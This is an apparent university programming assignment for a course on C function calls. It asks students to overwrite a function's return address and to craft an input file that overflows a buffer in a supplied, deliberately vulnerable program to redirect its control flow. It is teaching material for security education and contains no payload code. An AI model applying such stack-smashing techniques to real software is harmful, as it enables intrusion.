Roger L. Kraft

CS 22300 - Programming Assignment 4

This assignment makes use of the material from Chapter 3, Section 3.7 about the machine level implementation of C function calls. This assignment makes use of files contained in this zip file. This assignment is due Friday, December 11.

In this zip file there is a C source file called mischief.c. For the first part of this assignment, follow the instructions contained in that source code file. The main idea is that you are to write a function that modifies the return address stored in its stack frame so that the function returns somewhere other than where it is supposed to (this is the main idea behind "buffer overflow attacks" or "smashing the stack").

Here are two good references about stack frames.

In this zip file there is a C program called sittingDuck.c. Also in this zip file is an executable sittingDuck.exe and a data file called exploit.bin. Do not compile the program. Use the executable given in this zip file. Run the executable with the data file as its input (using I/O redirection) by using the following command line

C:\hw4> sittingDuck.exe < exploit.bin

The program will run, produce some lines of output, and then the program crashes. The data file causes a "buffer overflow" in the program and the buffer overflow causes the crash. As a preparation for doing the second part of this assignment, give yourself a detailed explanation of how the buffer overflow leads to the crash. In particular, figure out which line of the program causes the crash and why. You should be able to make specific references to the assembly language listing of the program (which is also provided in the zip file) and to the way the program creates its stack frames.

The second part of your assignment is to construct your own exploit2.bin input that, when read in by sittingDuck.exe, corrupts the stack of the function vulnerable() (in sittingDuck.c) in such a way that when vulnerable() returns, it returns to the call to the printf() function in the else part in the main() function (just like in the first part of this assignment). Do not modify or recompile the program sittingDuck.c. Your exploit should work with the executable contained in the zip file. Test your exploit against the executable with a command line like the following:

C:\hw4> sittingDuck.exe < exploit2.bin

To create your exploit file, you may need a hex file editor. Here is a link to a fairly good free one (and if you know of a better one, please let me know).

Freeware Hex Editor XVI32

The best strategy for doing the second part of this assignment is to use the sittingDuck.s assembly language listing and the disassembly window in the Insight debugger to create a very detailed drawing of the running program's stack frames.

Turn in a zip file called CS223Hw4rname.zip (where Surname is your last name) containing your versions of mischief.c and exploit2.bin.

This assignment is due Friday, December 11.